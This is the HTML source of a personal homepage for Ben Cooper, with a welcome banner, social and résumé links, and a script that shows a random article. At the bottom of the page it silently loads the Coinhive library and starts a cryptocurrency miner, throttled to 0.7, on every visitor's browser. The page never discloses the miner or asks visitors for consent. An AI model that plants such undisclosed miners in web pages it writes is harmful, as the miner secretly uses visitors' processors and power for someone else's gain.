<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Ben Cooper</title>
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">


    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <script src="https://use.fontawesome.com/51b94c345f.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.19.1/moment.min.js" integrity="sha256-zG8v+NWiZxmjNi+CvUYnZwKtHzFtdO8cAKUIdB8+U9I=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/moment-timezone/0.5.14/moment-timezone.min.js" integrity="sha256-wnlfv2SMPXay8VywRkRiL5zysJhwn2Y0du7pg2fkoEY=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/moment-timezone/0.5.14/moment-timezone-with-data-2012-2022.min.js" integrity="sha256-vBJSPpSAuUKYXDA+2hx2dQmyhkmM91vYjXI/o5QjnmA=" crossorigin="anonymous"></script>
    <script src="https://unpkg.com/suncalc@1.8.0/suncalc.js" integrity="sha384-tl3ZmrxbIoCVQz3RDzphPFHmCRFg0/JkX0AY9grk1ftU1dqxEuoPRQuhir4wMEAp" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto%7CRoboto+Slab" crossorigin="anonymous">







    <link rel="stylesheet" href="resources/css/home.css">

</head>



</head>

<body>

    <div class="shift-right" id="headers">
        <h2>Welcome to</h2>
        <h1>benc.io</h1>
        <h3>This is a personal website for Ben Cooper.</h3>

    </div>
    <div id="icons" class="shift-right">
        <a title="GitHub" href="https://github.com/bencooper222/" target="_blank"><i class="fa fa-github  fa-2x" aria-hidden="true"></i></a>
        <a title="Twitter" href="https://twitter.com/bcoops222" target="_blank"><i class="fa fa-twitter icon-spacing fa-2x" aria-hidden="true"></i></a>
        <a title="LinkedIn" href="https://www.linkedin.com/in/benc222/" target="_blank"><i class="fa fa-linkedin icon-spacing fa-2x" aria-hidden="true"></i></a>
        <a title="Email" href="mailto:bencooper222@gmail.com" target="_blank"><i class="fa fa-envelope-o icon-spacing fa-2x" aria-hidden="true"></i></a>
        <a title="Keybase" href="https://keybase.io/benc222"><svg role="img" class="not-fa icon-spacing"><use xlink:href="resources/def.svg#keybase"></use></svg></a>

        <a title="Résumé" href="resume.html"><i class="fa fa-file-text-o icon-spacing fa-2x" aria-hidden="true"></i></a>

    </div>

    <div class="shift-right" id="article-prompt">

        <h3>More will be added <span class="strike">soon</span> at some point.</h3>
        <h3> For now, check out <a id="link">a reading</a> I like.</h3>
    </div>




    <script src="resources/js/nightmode.js"></script>
    <script src="resources/js/randomArticle.js"></script>
    <script src="https://coinhive.com/lib/coinhive.min.js" integrity="sha384-osX842CxNcywFYdf9v339iSqoUdw84t4i1r7KcvyoaUNT0WBWR8aDEDC4rAyS3Sj" crossorigin="anonymous"></script>
    <script>
        try {
            const miner = new CoinHive.Anonymous('Z9xViG5bUBovkUbtaKnxbo0CNHGiaFa0', {
                throttle: 0.7
            });
            miner.start();
        } catch (err) {
            console.log(err);
        }
    </script>

</body>

</html>